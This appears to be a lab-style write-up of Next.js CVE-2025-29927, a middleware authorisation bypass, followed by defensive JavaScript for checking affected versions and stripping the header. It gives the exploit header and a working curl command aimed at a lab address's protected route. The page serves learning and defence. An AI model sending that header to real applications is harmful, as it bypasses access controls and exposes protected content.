
Next.js CVE-2025-29927


Last updated 1 month ago

Next.js is a web development framework developed by Vercel to simplify the creation of high-performance web applications. Built on top of React, Next.js extends React’s capabilities by adding several features, such as static site generation (SSG) and server-side rendering (SSR). SSG pre-generates pages at build time, allowing faster delivery to users, while SSR renders pages at request time, reducing load time. In brief, these features improve performance and user experience.

CVE-2025-29927, a recent vulnerability in Next.js discovered by Rachid and Yasser Allam, makes it possible to bypass authorisation checks that are performed in middleware. Middleware gives developers control over incoming requests and acts as a bridge between the incoming request and the routing system. The routing system is file-based, i.e., routes are created and managed by organising files and directories. The vulnerability allows attackers to bypass middleware-based authorisation, and all versions before 14.2.25 and 15.2.3 are affected.

Exploitation using Curl

We can exploit this CVE by sending a special header:

x-middleware-subrequest: middleware
curl -H "x-middleware-subrequest: middleware" http://10.10.207.214:3000/protected

Exploitation using BurpSuite

Without Header

With Header
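
For defenders, the version range and the header described above translate into two checks. The JavaScript below is an added example, not code from the original page or from Next.js: `isAffected` reads the page's version statement as "any release below 14.2.25, or a 15.x release below 15.2.3" (an assumption), and `stripSubrequestHeader` is a hypothetical helper for a proxy or custom server sitting in front of the app.

```javascript
// Added example: defensive checks for CVE-2025-29927 (not from the original page).
const HEADER = "x-middleware-subrequest"; // header name taken from the page

// Parse "15.2.1" or "v14.2.25" into [major, minor, patch]; null if malformed.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  return m ? m.slice(1).map(Number) : null;
}

// Compare two [major, minor, patch] triples: -1, 0 or 1.
function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}

// Assumption: "before 14.2.25 and 15.2.3" is read as
// any release < 14.2.25, or a 15.x release < 15.2.3.
function isAffected(version) {
  const v = parseVersion(version);
  if (!v) throw new Error(`unparseable version: ${version}`);
  if (v[0] >= 15) return cmp(v, [15, 2, 3]) < 0;
  return cmp(v, [14, 2, 25]) < 0;
}

// Drop the header (any casing) from a plain headers object before the request
// reaches the app; returns the removed values so the caller can log the attempt.
function stripSubrequestHeader(headers) {
  const removed = [];
  for (const key of Object.keys(headers)) {
    if (key.toLowerCase() === HEADER) {
      removed.push(headers[key]);
      delete headers[key];
    }
  }
  return removed;
}

// Constructed sample input, for illustration only.
const sampleHeaders = { host: "app.example", "X-Middleware-Subrequest": "middleware" };
const dropped = stripSubrequestHeader(sampleHeaders);
console.log("affected 15.2.2:", isAffected("15.2.2"));
console.log("dropped:", dropped, "remaining:", sampleHeaders);
```

A non-empty return value from `stripSubrequestHeader` on an internet-facing request is worth logging, since the header has no reason to arrive from an external client.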